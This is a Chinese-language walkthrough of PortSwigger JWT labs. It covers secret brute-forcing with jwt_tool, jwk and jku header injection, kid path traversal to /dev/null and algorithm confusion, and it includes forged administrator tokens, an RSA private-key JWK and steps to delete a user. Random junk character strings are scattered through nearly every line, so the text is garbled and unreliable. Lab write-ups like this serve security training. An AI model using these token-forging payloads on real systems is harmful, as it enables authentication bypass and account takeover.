Query a token ID against the logfile to see the details of that request
( s! Z7 x( d& I. Z( b4 d6 k
e.g. -Q jwttool_46820e62fe25c10a3f5498e426a9f03a
-v, --verbose When parsing and printing, produce (slightly more) verbose output.
$ [: y) X* l- y
9 l' r/ V2 K3 j' u
If you don't have a token, try this one:
9 t* N. ~$ z/ S/ w/ v# R% x
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po
Step 4:暴力猜解密钥* `+ s2 b/ H" b# Y) m9 y) S
3 z9 ^5 M1 @. u3 y$ a, p: I+ R
#命令格式
% W$ {% s, a7 \& c
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt
3 \4 t( P& ^2 P7 d3 }
#执行示例
. ?- {1 z0 ]0 H+ l' I
python3 jwt_tool.py eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw -C -d secrets.txt
: J7 U' I2 n2 P7 J% O. R 5 i) B$ ?* ]5 L* ]; k
1 g7 z! }7 `9 @* w8 `. L$ I' y% {/ u F1 \, |% j( ? 附加扩展:; W+ B2 ?+ B6 W7 `: j' s
1 U+ C; `6 l; x
#尝试破解密钥(HMAC算法)
( p/ U1 d# V' u$ m" s1 q! C# c
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt
; q. c4 y6 _0 C+ z2 I- T
( Q5 ], H. q- V; r) l
#尝试使用已知的公钥对不对称密码(RS-,EC-,PS-)进行"密钥混淆"攻击
' O! T: T, h* I) \/ A
python3 jwt_tool.py JWT_HERE -K -pk my_public.pem
) f2 q9 m" l" u( K( {$ M
#尝试使用"无"算法来创建未验证的令牌
python3 jwt_tool.py JWT_HERE -A
$ v7 z, O3 d6 r
#处理JSON Web密钥存储文件,重建公共密钥,然后测试密钥以查看验证令牌的密钥
python3 jwt_tool.py JWT_HERE -J -jw jwks.json
* K* O. X1 }# n" C
; K6 Y! ^) L3 y- D/ [# h# ^& Y
#生成一个新的RSA密钥对,将公钥作为JSON Web密钥存储对象注入令牌并使用私钥对令牌签名
0 p4 ]3 [* P# f P
python3 jwt_tool.py JWT_HERE -I
#欺骗远程JWKS:生成新的RSA密钥对,将提供的URL注入令牌,将公共密钥导出为JSON Web密钥存储对象(以提供的URL进行服务)并使用私钥对令牌签名
python3 jwt_tool.py JWT_HERE -S -u http://example.com/jwks.json
Step 5:随后在网页端重新设置密钥(secret1)并重新产生的字符串
* O, c% X& P8 q: l% G
Header:
eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9
{"kid":"ccf8b97a-94fe-4c7d-9b61-276f0654c2eb","alg":"HS256"}
1 @* t/ U# K+ {4 E' q2 a- g* @
9 Y/ o. m$ ?" h, v payload(前):
$ T3 ]6 Q @3 v8 x, I
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5OTk1OX0
{"iss":"portswigger","sub":"wiener","exp":1687799959}
payload(新):, Y) y+ i- E6 A7 ]- H
{"iss":"portswigger","sub":"administrator","exp":1687799959}
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9
& }9 N+ o# s* S) m; S; B% o" i. i( S 3 u2 d; {$ ]# W% q! t5 m# y. R
6 G# c- \" @2 {) C" o Signer:
E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0( ^9 t% \- v; U0 @
/ q9 T0 c8 }9 h+ H* V, Q3 y- _, r! L5 ]6 ` ; u/ Z3 }5 Q2 q6 ]: h
) y8 K& ]) p2 x4 h 最终高权限的JWT token如下:
eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9.E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0: T; J9 r9 }2 f4 n) {, e
, Y( V$ d* K5 V1 s! k7 \5 s
Step 6:访问/admin路径
& b4 ^2 m1 ?+ A/ V* l: U4 z% } H / ^2 j. d7 h% ~* J$ S# q2 V! j
1 B h2 m3 W5 gStep 7:调用接口删除用户完成解答4 }, c* x M5 F6 x* `' u9 p
7 M1 A6 o) Q# q3 ~/ a9 [ v 8 z* Z+ @4 E; p/ u" c+ r
) @' o1 n7 ]) O+ }6 |5 j/ l# u
! u* t( r% p* O" n! Y JWT头部注入! S7 j5 V5 M8 M
/ R) i! N( h6 e9 v8 B8 _8 ?场景介绍2 Z: t, K# ^1 O) L
. b \- i- Y C( l" s 如果服务器端使用一个非常脆弱的密钥,我们甚至有可能一个字符一个字符地来暴力破解这个密钥,根据JWS规范只有alg报头参数是强制的,然而在实践中JWT报头通常包含几个其他参数,以下是攻击者特别感兴趣的:
9 n# u+ W1 g+ d这些用户可控制的参数每个都告诉接收方服务器在验证签名时应该使用哪个密钥,下面我们将介绍如何利用这些参数来注入使用您自己的任意密钥而不是服务器的密钥签名修改过的JWT8 F! [$ B+ c( v1 H/ a+ O
注入场景1+ e7 T, ?' E$ S8 ?' g
; O; b8 i6 |. ^. B w下面我们介绍如何通过JWK参数注入自签名的JWT,JWS(JSON Web Signature)规范描述了一个可选的jwk header参数,服务器可以使用该参数以jwk格式将其公钥直接嵌入令牌本身,您可以在下面的JWT head中看到具体的示例:8 U" ~+ D( j' Y7 G: N
6 h5 E3 b9 H. _7 {$ T
{
2 w9 g- I3 p# O1 Y% G- Z7 T- L
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
"typ": "JWT",
"alg": "RS256",
"jwk": {
7 l: M6 O* y5 J) ~, j# F& e
"kty": "RSA",
7 O! p3 N# A7 l0 X# E G7 R
"e": "AQAB",
"kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG",
9 H x6 s% H! S: w, w
"n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m"
- J7 U$ d L4 x3 B) |
}
0 @; {& w2 c# y0 O' ~
}
理想情况下服务器应该只使用有限的公钥白名单来验证JWT签名,然而错误配置的服务器有时会使用jwk参数中嵌入的键值,您可以通过使用自己的RSA私钥对修改后的JWT进行签名,然后在jwk头中嵌入匹配的公钥来利用这种行为,Burpsuite的JWT Editor扩展提供了一个有用的功能来帮助您测试此漏洞,您可以在Burp中手动添加或修改JWT参数
靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection, \4 S- j; L6 G/ r3 Q$ V
d6 `7 q9 {9 Q0 ~1 f/ x* t) L" m
& N6 {7 ?# T! Z$ v' [) D5 c8 u. _8 v; J Step 1:点击"ACCESS THE LAB"访问靶场! r/ R$ _6 t5 O% C, M" a* N8 a) S3 x
! A3 f5 e& i; }/ a8 p6 l9 a( g# a) B1 e
( b9 c! E/ W& Z Step 3:点击"My Account"登录系统8 X4 G0 X! D7 `
, F- m( ]) V! K5 Y. O! @7 m+ ewiener:peter
. N, n9 b( v# A' s4 r& h* n- m& i1 I8 e/ r6 n & Q) Y& b: Q2 h
Step 4:登录之后可以看到如下邮箱更新界面
7 T% ~. J) J4 g4 l6 |( K % {: t" P% n$ d# B) b8 d
' {% \7 s8 Y' p# w: i# p) KStep 5:下面我们开始操作,不过在此之前我们得先武器化以下自己,在Burpsuite界面选择"Extender"选项卡,紧接着点击"BApp Store"安装"JWT Editor"8 I$ p4 a2 n( ], {5 a8 Z9 F+ e' ?1 T
! c, ?! P# z( A6 `- v+ D D8 V. x; A0 k# J& V' M0 o0 s, G& f
& h, T2 |' [7 D/ \ k 之后你可以看到如下的选项卡界面
. h2 e1 ~& W- _. C! Y- ^- V/ l% [$ C8 y+ O. n" A ; A/ A. b6 E( R* W9 K- t/ H
Step 6:生成一个新的RSA密钥& l+ k, ?2 z5 P7 Z8 j+ B/ l6 ~' @
8 w, a# t. C& P' e" Z, e
{
"p": "8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU",
"kty": "RSA",
"q": "1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8",
9 x& n9 Y% G; x+ {( y; F
"d": "Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ",
. K% B$ N" B2 q
"e": "AQAB",
"kid": "fa018615-0392-4d15-89bb-a2c637d9adbd",
"qi": "XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks",
$ A M2 y: V( t; V
"dp": "0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0",
" n' Z+ a& r! Q6 ~& m- _+ |5 |
"dq": "QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M",
"n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w"
6 s, R p1 \5 ] }
}7 Z X' C: l. q% g1 U9 R5 E
! L1 h% u0 K0 Y# ?0 ~( s" m: p8 m
5 g% d' W# a* ~, S Step 7:刷新页面拦截到请求并将请求发送到Repeat模块. W Y9 f3 W6 X& H* M
( ~( l4 b# \% L5 F$ l8 \) M 5 f( g. y. E8 L! k; a& w
. e: `& W& W c; P$ [( [1 y: n; N" ^! I% o. n Step 8:在Repeat模块,我们切换到JSON Web Token选项卡,修改JWT的有效负载将sub内容修改为administrator% L7 ~% s+ G" O( T, y! [2 @, _
# g# Q5 g) ]/ I6 i# t p6 @0 wF# q' _' A C7 x! x7 o
* C0 h3 y; c2 f
! T" p5 F3 G F2 O; r Step 9:点击"Attack",然后选择"Embedded JWK",出现提示时选择您新生成的RSA密钥
/ y! X8 F% s7 \" F1 ~- [- {' q3 N& m; ? Z6 \
2 ~4 x* S4 x* G1 }
Step 10:之后成功越权
: x. m% [: j. x, n* p, f. Q" ~
( `& f K! k7 b( { i+ k% i$ ^% E Step 11:调用敏感操作接口删除carlos用户完成解题
2 X$ ]0 q3 D$ V7 ^ % S" c8 w4 k7 Z
1 D% F0 F8 i) q# C% A# { R! \9 b+ |5 G6 F F7 N& C/ L; u6 M% n
8 e# V/ d g* i: n9 @; w7 s$ K& V$ l ; D8 y( B6 s3 ^5 U
( R( _, R; a$ Q
1 U/ O! S- ~' x+ T* \; O0 |6 f0 _7 e6 M1 G" E 注入场景2
- _: w: p, R. H" G$ P# z R6 H8 W. u) v! \' a& c- v3 s 有些服务器可以使用jku(jwk Set URL)头参数来引用包含密钥的JWK集,而不是直接使用JWK头参数来嵌入公钥,当验证签名时,服务器从这个URL获取相关的密钥,这里的JWK集其实是一个JSON对象,包含一个代表不同键的JWK数组,下面是一个简单的例子:
{
"keys": [
{
"kty": "RSA",
"e": "AQAB",
"kid": "75d0ef47-af89-47a9-9061-7c02a610d5ab",
"n": "o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ"
. W D- c; M, X4 B
},
6 o% a+ W9 f1 q/ a; ?4 |
{
"kty": "RSA",
$ p+ o$ g8 x1 G
"e": "AQAB",
, J+ x# q# }5 A" X& x, L! ^
"kid": "d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA",
7 O# W; ~% E8 t" c% u4 x
"n": "fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw"
# U U; z1 c3 ~. l5 h
}
- o. K! k* F% D# I8 Z
]
2 n* V3 g1 T; @* K$ ^9 I4 l Z2 i
}
JWK集合有时会通过一个标准端点公开,比如:/.well-known/jwks.json,更安全的网站只会从受信任的域获取密钥,但有时您可以利用URL解析差异来绕过这种过滤,下面我们通过一个靶场来实践以下
0 e- n! Y2 O% i7 q2 C. L
靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection' {3 e0 u) D' L3 p* d4 C
. V9 U: P" ^% X: v/ r # J+ E; {* N9 c8 q6 L
' a3 H- h$ W+ d4 O7 p
Step 1:首先点击上方的"ACCESS THE LAB"选项卡进入实验环境
3 B/ v" G! b( U' W% K
Step 2:登录系统- Z* Y. t3 S- E" w
5 _ j1 r" r- _ wiener:peter
; c( V0 b9 ? L1 `/ [ B+ c. J" D7 H- g2 L" z4 N- J P# L) A% [
Step 3:随后你会看到一个用户邮箱更新的表单
- \4 R2 s, x+ X3 O# Z8 E/ L1 @; z; A7 _& u
$ g9 a8 l5 s/ i! e/ R Step 4:使用burpsuite生成一个新的RSA密钥$ j$ n' Z* I" s
$ ?4 V+ T$ c$ ]# O. l
{
"p": "8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU",
"kty": "RSA",
"q": "1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8",
7 x; n- x! t- T5 @' G! [+ l
"d": "Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ",
& s0 n' D" K1 m; ^4 `
"e": "AQAB",
( h: n* W+ x, H! s" }% h# U
"kid": "fa018615-0392-4d15-89bb-a2c637d9adbd",
"qi": "XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks",
"dp": "0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0",
"dq": "QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M",
" @$ v; y! b$ F( z$ e/ i; m* q3 K
"n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w"
}
* ~5 X# Y Y8 k, b M: P, ^+ J e
9 `! l, D# Q! g/ ~6 k Step 5:发送请求到repeat: g( K9 [! s7 w4 ?
+ h" J' I0 J/ y) m# h; a Step 6:复制公钥作为JWK
0 C0 U( R- X/ w- F& g R; \
{
"kty": "RSA",
3 l0 J$ C6 o( E) w# K; X/ p! f
"e": "AQAB",
"kid": "fa018615-0392-4d15-89bb-a2c637d9adbd",
"n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w"
}, M5 A$ e. o2 B) @
, {7 w- r) `5 l: x5 P8 J8 Q
( G: U; O( w; P* F2 @+ a' i1 G. ]6 m3 Q! O: }" G Step 7:在题目中选择"Go eo exploit server",然后加上key头并保存到exploit的body中
{
"keys": [
7 W, g. H& m4 p
{
, l- T) X4 W; l1 M( E# D
"kty": "RSA",
"e": "AQAB",
% I7 w( c4 C# Z# M
"kid": "fa018615-0392-4d15-89bb-a2c637d9adbd",
$ I: M2 h; U+ @: g& Y, b2 Q6 {
"n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w"
}
! K) i4 x* D. j
]
}
* G2 r+ |$ h3 a/ V; V, [# w 3 m3 T2 L& ~' [& y f( { c
" T* \ [' r0 p: R( r9 w( [ 4 m: z& F# h2 z0 }1 n& e
Step 8:然后切换至repeat的"JSON Web Token"界面,将kid修改成自己生成的JWK中的kid值,将jku的值改为exploit. H8 m! G( U, o @
$ Y% A- }9 A5 F6 e3 E+ G# B8 s: D4 {/ T& {; n& `5 x6 T
% O! I9 I( X& T4 c. G C
Step 9:切换sub为administrator
& ^7 {7 M+ Z: X6 R ?q% |8 P& {. m2 P! r' }
% E9 A2 y. Z- _: L6 a5 {: a1 H4 H% ]4 H% O Step 10:点击下面的sign,选择Don’t modify header模式
6 \ D4 L% ~' T& }. \
Step 11:更改请求路径发送请求成功越权
9 t/ x4 Q# o! Z
- h) p$ Y) ?9 `( I2 \$ N) ^Step 12:请求敏感路径删除carlos用户
4 U) Q0 S! u9 ^0 \0 J
Step 13:成功解题 n5 p) Y1 \' }+ B7 q0 E7 P
- g. \ _" o; s6 H5 j; R& ?
# 注入场景3+ T" U3 z% V' I" m/ D9 l
服务器可能使用几个密钥来签署不同种类的数据,因此JWT的报头可能包含kid(密钥id)参数,这有助于服务器在验证签名时确定使用哪个密钥,验证密钥通常存储为一个JWK集,在这种情况下服务器可以简单地查找与令牌具有相同kid的JWK,然而JWS规范没有为这个ID定义具体的结构——它只是开发人员选择的任意字符串,例如:它们可能使用kid参数指向数据库中的特定条目,甚至是文件的名称,如果这个参数也容易受到目录遍历的攻击,攻击者可能会迫使服务器使用其文件系统中的任意文件作为验证密钥,例如:
- @% e" I; t3 S* v% ?. {' P' ^. M5 n h0 @) K9 v
{
$ E9 H$ Y0 ^2 ^3 t# T
"kid": "../../path/to/file",
"typ": "JWT",
) r1 l9 X$ _0 l+ ~# s" T+ _7 i, i
"alg": "HS256",
"k": "asGsADas3421-dfh9DGN-AFDFDbasfd8-anfjkvc"
}
, w! D, R, z. M; W+ G) ?
如果服务器也支持使用对称算法签名的jwt就会特别危险,在这种情况下攻击者可能会将kid参数指向一个可预测的静态文件,然后使用与该文件内容匹配的秘密对JWT进行签名,从理论上讲您可以对任何文件这样做,但是最简单的方法之一是使用/dev/null,这在大多数Linux系统上都存在,由于这是一个空文件,读取它将返回一个空字符串,因此用空字符串对令牌进行签名将会产生有效的签名
9 G+ |% E" | f; P: P$ x: m
靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal5 d; j: W: _* K- K$ ~( @/ y1 L
7 k9 R8 i, Y. Y8 q" I. h
4 N! S" R8 i' v3 O Step 1:点击上方"Access The Lab"进入靶场
& j" N {, y7 D" U- B2 ?( a% n
Step 2:登录靶场
- y6 [! w. Y" V& _ ; V5 m7 E x4 Z
' A6 a2 m; E( J9 g& s- M' @$ s. D Step 3:登录后进入到如下邮箱更新界面
3 H- w9 ~0 `' g& U# I7 V- [2 }- G: Y7 K 4 u4 s6 J, }; W% y! V, `6 T
' m8 ?+ q$ T- t8 a) @# I. [3 z; { Step 4:使用burpsuite的插件生成一个对称密钥(Symmetric Key)并将k的值修改为"AA=="即为null
! v1 m- Z3 o7 l) g6 }% C
{
"kty": "oct",
8 C0 J6 @5 C5 T5 i3 w( [
"kid": "38576880-33b7-4446-ade4-f1a78bb6d5c2",
: `* ^0 G4 F" [
"k": "AA=="
}+ ^! T" h' F- m3 I7 ?
( @2 O# E' D" u8 K
Step 5:拦截一个请求将其发送到repeat模块4 _, D4 O i I5 q/ c0 [
3 Z+ z# j0 p- ~+ l# I 0 q! h: u/ g" Z/ `
Step 6:此时直接访问/admin——提示"401 Unauthorized"$ {3 W! ^: o& N8 c1 [. ]) p0 B0 R
8 M" o+ P6 S" F 4 _8 { ^& ^$ q, u( o* x
: f5 I. J* {6 E3 F4 _ |Step 7:在JSON Web Token界面中修改kid值和sub进行目录遍历,这里的"/dev/null"文件名与"AA=="一致都为null,对称密钥,所以可以成功绕过4 g- C/ R# ~8 y2 B
2 l, P0 {0 t9 [/ c9 p
{
"kid": "../../../../../../../dev/null",
"alg": "HS256"
}
* O0 E# y; s6 _
Step 8:点击sign选择OCT8 的密钥攻击# c/ Y6 g0 L/ i$ v. }/ m
4 N2 ~. B) ]1 Q/ A' Q: l9 S3 w H# x : m+ e5 w1 [$ S
, P# T M0 K5 G! I) O1 }! r) c) S1 U. [! a' A$ w2 Z( ^
( x' A9 n! m% |+ T- } Step 9:成功越权
, M, ^7 W! Y2 Q$ _
9 G- C' I, C5 h6 m; y Step 10:调用敏感接口删除carlos用户完成解题
' z- p/ |: }, R" ~' Z5 T6 f& F6 Y8 O. o
9 O: E( q/ Q% P' W8 B
3 j: e8 x) z+ \JWT算法混淆# `$ w8 i& K" c( n% a
算法混淆4 X" `* ?/ ~) E
算法混淆攻击(也称为密钥混淆攻击)是指攻击者能够迫使服务器使用不同于网站开发人员预期的算法来验证JSON web令牌(JWT)的签名,这种情况如果处理不当,攻击者可能会伪造包含任意值的有效jwt而无需知道服务器的秘密签名密钥
+ o' Z3 A2 B9 \, M6 _% z! y
JWT可以使用一系列不同的算法进行签名,其中一些,例如:HS256(HMAC+SHA-256)使用"对称"密钥,这意味着服务器使用单个密钥对令牌进行签名和验证,显然这需要像密码一样保密
6 N& @6 }! ?( j1 a5 D4 ~ 6 M7 W( v4 u1 P; B/ T' Q; I- b5 Y
其他算法,例如:RS256(RSA+SHA-256)使用"非对称"密钥对,它由一个私钥和一个数学上相关的公钥组成,私钥用于服务器对令牌进行签名,公钥可用于验证签名,顾名思义,私钥必须保密,但公钥通常是共享的,这样任何人都可以验证服务器发出的令牌的签名
0 `' L8 t* O$ @6 K
( m! h/ Z$ X6 A3 L; ^3 T混淆攻击6 \+ N2 f9 \7 \% l0 m% y0 }* f
算法混乱漏洞通常是由于JWT库的实现存在缺陷而导致的,尽管实际的验证过程因所使用的算法而异,但许多库都提供了一种与算法无关的方法来验证签名,这些方法依赖于令牌头中的alg参数来确定它们应该执行的验证类型,下面的伪代码显示了一个简单的示例,说明了这个泛型verify()方法在JWT库中的声明:
& p) ]- O( s( n) {7 L+ _4 k
function verify(token, secretOrPublicKey){
$ ]2 R' ]; c: T( b1 Y9 e y
algorithm = token.getAlgHeader();
if(algorithm == "RS256"){
// Use the provided key as an RSA public key
} else if (algorithm == "HS256"){
// Use the provided key as an HMAC secret key
3 h6 `' \1 N4 b; g8 T8 {
}
}
使用这种方法的网站开发人员认为它将专门处理使用RS256这样的非对称算法签名的JWT时,问题就出现了,由于这个有缺陷的假设他们可能总是传递一个固定的公钥给方法,如下所示:
4 K. V! l; h. M$ h9 f
publicKey = <public-key-of-server>;
token = request.getCookie("session");
verify(token, publicKey);+ E7 v2 P/ V% i
在这种情况下如果服务器接收到使用对称算法(例如:HS256)签名的令牌,库通用verify()方法会将公钥视为HMAC密钥,这意味着攻击者可以使用HS256和公钥对令牌进行签名,而服务器将使用相同的公钥来验证签名(备注:用于签署令牌的公钥必须与存储在服务器上的公钥完全相同,这包括使用相同的格式(如X.509 PEM)并保留任何非打印字符,例如:换行符,在实践中您可能需要尝试不同的格式才能使这种攻击奏效)
- Z' [+ R- E% K0 P9 j G
攻击流程简易视图如下:' H6 H" r; D( f* a" G( c5 a' u
& v+ a6 R- u% Z$ ?2 i1 t( M 攻击演示. r5 a" \4 m( e; P1 r
5 N* C, \3 J! t. s- k ?/ V 靶场地址:https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion N& o' v; t$ g, e% t% R3 F
5 ^% x' O* |# W Step 1:点击"Access the lab"访问靶场& M3 L3 J e9 b
4 K$ l- a! N% q Step 2:使用账户密码登录
% J$ r0 B* m' N. i4 f Step 3:登录之后进入到用户邮箱更新操作界面9 g1 z P. W9 k, q( s: _
8 k0 m" E, h6 L0 Z$ p, J
, I" e- n4 i1 F0 T4 X8 W AStep 4:服务器有时通过映射到/jwks.json或/.well-known/jwks.json的端点将它们的公钥公开为JSON Web Key(JWK)对象,比如大家熟知的/jwks.json,这些可能被存储在一个称为密钥的jwk数组中,这就是众所周知的JWK集合,即使密钥没有公开,您也可以从一对现有的jwt中提取它3 a, ?7 o* x- m- V2 o4 r
9 Y1 e- w3 X: o6 t! @
{
% X6 K! q2 Y( `* v- v
"keys": [
( {! q4 R! v, M) a
{
, U) ]/ ?* G7 f6 p7 }, |. W
"kty": "RSA",
9 X" E# |! Y1 ^- e
"e": "AQAB",
4 R `0 W! |6 O7 V( ]
"kid": "75d0ef47-af89-47a9-9061-7c02a610d5ab",
4 Y' [5 `. g& {& g8 x% M
